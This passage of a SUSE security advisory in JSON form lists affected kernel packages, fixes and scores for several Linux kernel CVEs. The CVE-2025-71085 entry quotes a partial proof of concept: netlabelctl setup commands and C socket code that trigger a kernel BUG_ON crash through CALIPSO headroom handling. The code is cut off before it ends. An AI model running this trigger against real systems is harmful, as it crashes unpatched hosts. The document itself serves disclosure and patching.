"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n 